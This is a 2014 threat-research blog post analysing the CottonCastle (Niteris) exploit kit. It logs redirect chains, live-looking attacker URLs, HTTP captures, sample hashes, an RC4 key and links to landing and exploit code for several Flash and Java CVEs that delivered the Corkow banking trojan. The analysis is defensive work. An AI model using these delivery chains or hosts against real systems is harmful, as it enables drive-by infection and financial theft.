2014-06-09 - Study
Meet Niteris EK (formerly known as CottonCastle)
 |
| Pamukkale (source image: sina.com) |
<Edit: 2014-07-13>
On the redirector to CottonCastle :
 |
2014-07-13 - "CottonCastle - realname Niteris ;)" |
Thanks for that.
So Plague in Latin it seems.
</edit>
Thanks to an Independant researcher from Russia who shared some referer driving to an Exploit Kit on tcp 27005, I was able to meet again the "Unknow EK" that was first spotted by EKWatcher in September 2013.
Pattern for this EK were like :
 |
| Custom TDS then CottonCastle - 2013-09-16 from GB |
GET http://alabamarog.socket-render.info:5125/h2x/3/a627d480c37cfaf6f3634150496340ed/http%3A%2F%2Fgoo.gl%2FoYb4sq
207 Multi-Status (text/html)
GET http://alabamarog.socket-render.info:5125/h2p/3/BG/f444ab1cfeb2945d149c03508367776f.dts
200 OK (application/octed-stream)
GET http://alabamarog.socket-render.info:5125/h2i/3/BG/c708c60762f6a35c5fce213eb840ce51
200 OK (application/octed-stream)
GET http://alabamarog.socket-render.info:5125/callme?r=111
200 OK (text/html)
------------------------------------------
OT: that infection chain was really interesting.
Out of Topic 1 : the redirecting js on the compromised website is quite interesting
 |
| js ( http://pastebin.com/T4RLpFuN 2014-06-05) in front of the first TDS seems to give a weight to the event and will fire only for IE and Firefox Not sure how effective is this (i mean compared to basic onmouse move) Reference to Justin Bourque Reload: 2014-06-06 http://pastebin.com/XeHfVTKU Reference now to "Michelle reporter" |
Out of Topic 2 : the first TDS will drive you to Angler EK from US :
 |
| Angler EK after first TDS in US |
and from DE in some case:
 |
| Angler EK after first TDS in DE (in the night) By day it was redirecting to CottonCastle Fully working on the 2014-06-05 but 409 on the 2014-06-06 |
 |
| Suricata with ET rules alerts on traffic generated by 6f56f55c38be1cdad7ca498f4e93e219 |
 |
| First TDS redirecting to both CottonCastle's TDS and Nuclear Pack From Russia 2014-06-06 |
Now back to CottonCastle.
------------------------------------------
Pattern did not change that much, it now looks like :
 |
2 TDS then CottonCastle 2014-06-05 from DE Note the c.hit.ua counter both on the second TDS and in the landing. Note the reverse 2letter country code in many calls. |
There are points that i have trouble to explain.
The day after the Counter have disappeared and the Exploit Kit seems not replying to hosts from RU/UA. Really strange when we see what those counter were like on the 5th :
 |
| Distribution of Countries hiting the Exploit Kit landing 2014-06-05 |
 |
| Distribution of OS hiting the exploit Kit landing 2014-06-06 |
 |
| One month of stats on the counter that was associated to the landing 2014-06-05 (note...EK is not associated to that counter right now) |
Now let's see how this Exploit Kit is "weaponized".
CottonCastle : CVE-2013-0634
 |
| Successfull pass for CVE-2013-0634 in CottonCastle (from CA) 2014-06-06 (post shellcode call missing here) |
GET http://afasaq.jax-updates .pw:4433/forum/view/3/494f2e325d7efeaa894484780954a500/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)
 |
| Part of CottonCastle landing (full here : http://pastebin.com/k3nuNY5M) tied to the flash exploit |
200 OK (application/x-shockwave-flash)
ecf01774b7632eb9c62d862d95570401 CVE-2013-0634
The day before it was : c224580e17d8bd4c251da29ea8bef647
GET http://afasaq.jax-updates .pw:4433/forum/advertisement/3/AC/464feda74d209abca9a05f244f4d7f3e
200 OK (text/html) ( detailed in CVE-2013-2465 pass)
GET http://afasaq.jax-updates .pw:4433/forum/torrents/3/AC/37e8ccf9bf7a70d40d877bb592bd788a
200 OK (application/x-bittorrent) Decrypted payload : 953bf448637203cec92ea2d605a47d0c Payload is Corkow (Thx Denis Laskov )
In that case i blocked the shellcode from executing the payload.
 |
| Shellcode trying to execute payload. |
GET http://afasaq.jax-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
Host IP:
62.113.208.7
47447 | 62.113.192.0/18 | TTM | DE | 23MEDIA.EU | 23MEDIA GMBH
CottonCastle : CVE-2014-0515
It's the first time i see it in an Exploit Kit
 |
| CVE-2014-0515 firing in CottonCastle from DE 2014-06-05 - Flash 13.0.0.182 |
GET http://ajigin.iam-updates .pw:4433/forum/view/3/f2fdfed9c68b57f0ce6427defab7aa08/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)
GET http://ajigin.iam-updates .pw:4433/forum/tracker/3/ED/333f38dc127936ab62ca5ce517c1ccd0/346.343.343.481/
200 OK (application/x-shockwave-flash) 180e226457d9370ba590ca2a722e446f
GET http://ajigin.iam-updates .pw:4433/forum/advertisement/3/ED/4babaee37c31c47fe9dadc004f7a8732
200 OK (text/html) ( detailed in CVE-2013-2465 pass)
GET http://ajigin.iam-updates .pw:4433/forum/torrents/3/ED/277ff652f2cb92471a6abfd2a5f26341
200 OK (application/x-bittorrent) Decrypted payload 7773524265ed5409938950bfc7fca574 (same day i also got: 7794934b674a07d42b0e20a6acd49039 ) Again Payload is Corkow (Thx Denis Laskov )
GET http://ajigin.iam-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
CottonCastle : CVE-2013-2465
 |
| CottonCastle firing code exploiting CVE-2013-2465 to java6u45 2014-06-06 |
GET http://abuzuc.jax-updates .pw:4433/forum/view/3/f379a32d59f0fe08d75cecbb9b12b558/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)
 |
| Part of the landing tied to that exploit (full here : http://pastebin.com/Spv9TYvd ) |
Note : "OrbitWhite" is the rc4 for the rc funtion in the jar file.
Session after Hex2bin and rc4 decryption : http://abuzuc.jax-updates.pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c
GET http://abuzuc.jax-updates .pw:4433/forum/profile/3/AC/874a6ece58907e1f46934ea503aede0d.djvu
Session after Hex2bin and rc4 decryption : http://abuzuc.jax-updates.pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c
GET http://abuzuc.jax-updates .pw:4433/forum/profile/3/AC/874a6ece58907e1f46934ea503aede0d.djvu
200 OK (text/html)
 |
| jnlp 2014-06-06 http://pastebin.com/FNQgEbrt |
GET http://abuzuc.jax-updates .pw:4433/forum/topic/3/AC/c94043e9a1ef9b59b382d5803fa3dadd.mkv
200 OK (application/octed-stream) Exploit for CVE-2013-2465
 |
| The java dropped to jre6u45 is nice :) |
java.dll : d.dat : 279f500d9d3aff957ff9e67ffd5165ed
j.js : http://pastebin.com/0GXycyMS
GET http://abuzuc.jax-updates .pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c
200 OK (text/html) http://pastebin.com/JrTXX5eF
 |
Contains a vbs script (note the security product process names) |
GET http://abuzuc.jax-updates .pw:4433/forum/torrents/3/AC/7dc49f51e16116534357d5918c33a29a
200 OK (application/x-bittorrent) Decoded payload f2788007f8b27dedac15aca71d0bf8f2 Corkow
Once again i blocked the payload execution but if infected you should get :
 |
| Call back to EK once payload is executed |
GET abuzuc.jax-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
CottonCastle : CVE-2013-0422
I won't go in as much detailed as i did for CVE-2013-2465 but it's the same approach
GET http://bzycok.key-updates .pw:4433/forum/view/3/8216ed0f457b3ac54ca52cd13383fe25/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)
GET http://bzycok.key-updates .pw:4433/forum/profile/3/LN/0d240529777cb6a302fdbbc437633a3d.djvu
200 OK (text/html)
GET http://bzycok.key-updates .pw:4433/forum/topic/3/LN/5453f6a894b378e19e5af7cce177803c.mkv
200 OK (application/octed-stream) 4724436c4f4a0d3406142b8cb9bee3c3
 |
| Piece of CVE-2013-0422 in CottonCastle 2014-06-06 |
GET http://bzycok.key-updates .pw:4433/forum/advertisement/3/LN/54642665c1bd63f868f64db861c8a953
200 OK (text/html) Encoded VBS
GET http://bzycok.key-updates .pw:4433/forum/topic/3/LN/5453f6a894b378e19e5af7cce177803c.mkv
409 Conflict (text/html)
200 OK (application/x-bittorrent) < Decoded Payload : 22e98a119b8e0f1c0616fd7e377d0ec6 same familly as previous.
GET http://bzycok.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
CottonCastle : CVE-2013-2460
Once again I won't go in as much detailed as i did for CVE-2013-2465 but same approach
GET http://bkysur.key-updates .pw:4433/forum/view/3/22bd553e598f5b43b7cfee1ee2630080/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)
GET http://bkysur.key-updates .pw:4433/forum/profile/3/AC/bbce0e49bfc08250668441d0b80b7a63.djvu
200 OK (text/html)
GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
200 OK (application/octed-stream) be66263cd1524b72423c0b5ec8094113
GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
409 Conflict (text/html)
GET http://bkysur.key-updates .pw:4433/forum/advertisement/3/AC/540ff821785fd90aeed5e30ee351a6c9
200 OK (text/html) Encoded VBS
GET http://bkysur.key-updates .pw:4433/forum/torrents/3/AC/bc5215485d8c485b2b277a5f569a6bad
200 OK (application/x-bittorrent)
GET http://bkysur.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
I may update this post later once i face it.
 |
| CVE-2013-2460 in CottonCastle : 2 |
GET http://bkysur.key-updates .pw:4433/forum/view/3/22bd553e598f5b43b7cfee1ee2630080/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)
GET http://bkysur.key-updates .pw:4433/forum/profile/3/AC/bbce0e49bfc08250668441d0b80b7a63.djvu
200 OK (text/html)
GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
200 OK (application/octed-stream) be66263cd1524b72423c0b5ec8094113
 |
| CVE-2013-2460 in CottonCastle 2014-06-06 |
409 Conflict (text/html)
GET http://bkysur.key-updates .pw:4433/forum/advertisement/3/AC/540ff821785fd90aeed5e30ee351a6c9
200 OK (text/html) Encoded VBS
GET http://bkysur.key-updates .pw:4433/forum/torrents/3/AC/bc5215485d8c485b2b277a5f569a6bad
200 OK (application/x-bittorrent)
GET http://bkysur.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
CottonCastle : CVE-2013-2551:
This CVE has been captured by Set_Abominae and covered by Malwageddon and identified by regenpijp1I may update this post later once i face it.
Todo.
CVE-2011-3544 ?? -- Didn't have the opportunity to check the EK with Java6 < 27 or at least < 18.AV Process name Callback test. CVE-2013-2551 path.
Exploitation Graph :
This Exploit Kit is not widely used (maybe only by the operators Corkow botnet - and 2nd TDS).
Files: Here
[Edit]
 |
| Niteris Exploit Kit Screenshot : Source Group-IB (page 10 of this report (PDF) on buhtrap ) |
[/Edit]
Credits : Thanks Timo Hirvonen for confirming the 2 flash CVE, to Arseny Levin for defining the CVE-2013-2460. Thanks to EKWatcher for the rc4 decryption routine. Thanks Will Metcalf for many inputs. And warm thanks to the "independant researcher from russia" for the Referer.Thanks Denis Laskov for identifying the payload.
Read more :
CottonCastle EK: "I hate to break this to you, but this isn't gonna be an open casket." - 2014-04-08 - Malwageddon
Corkow: Analysis of a business-oriented banking Trojan - 2014-02-27 - Robert Lipovstky - Eset
Read more :
CottonCastle EK: "I hate to break this to you, but this isn't gonna be an open casket." - 2014-04-08 - Malwageddon
Corkow: Analysis of a business-oriented banking Trojan - 2014-02-27 - Robert Lipovstky - Eset
Post - publication Reading :
APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks - 2016-02-08 - TheSecureList
Another look at Niteris : post exploitation WMI and Fiddler checks - 2015-05-12